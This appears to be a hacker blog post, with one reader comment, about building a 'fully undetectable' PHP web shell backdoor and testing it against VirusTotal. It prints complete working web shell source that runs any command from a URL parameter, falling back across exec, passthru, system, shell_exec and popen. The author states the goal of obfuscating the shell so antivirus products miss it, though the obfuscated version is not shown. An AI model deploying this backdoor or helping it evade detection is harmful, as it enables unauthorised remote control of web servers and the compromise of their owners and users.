Today, i wanna try to create a simple undetected (hopefully FUD) web shell backdoor. I am using VirusTotal (yes, i want them to check my file, lol..).
So, what is FUD?
Fully undetectable (usually shortened as “FUD”) can stand for data that had been encrypted, making it appear to be random noise. It can also stand for software that cannot be detected by anti-viruses when a scan is performed. The term is used in hacker circles to refer to something that appears to be clean to many anti-viruses, even though it is a hacking tool.
Source :Â https://en.wikipedia.org/wiki/Fully_undetectable
Here is my simple (actually primary) shell without any obfuscation :
<?php error_reporting(0); set_time_limit(0); function eksekusi($in) { $out = ''; if(function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); }elseif(function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); }elseif(function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); }elseif(function_exists('shell_exec')) $out = shell_exec($in); elseif(is_resource($f = @popen($in,"r"))) { $out = ""; while([email protected]($f)) $out .= fread($f,1024); pclose($f); } return $out; } if(isset($_GET['cmd'])) { echo "<pre>"; echo eksekusi($_GET['cmd']); } ?>
and here is the VirusTotal result :
Now we can see, my web shell was detected by Avast, AVware and Bkav.
Lets try to obfuscate the shell.
And here is the VirusTotal result :
Cheers..
I believe that when we upload a file for testing on virustotal and he passes it he puts a double check on the file afterwards, because he always accuses it as malware afterwards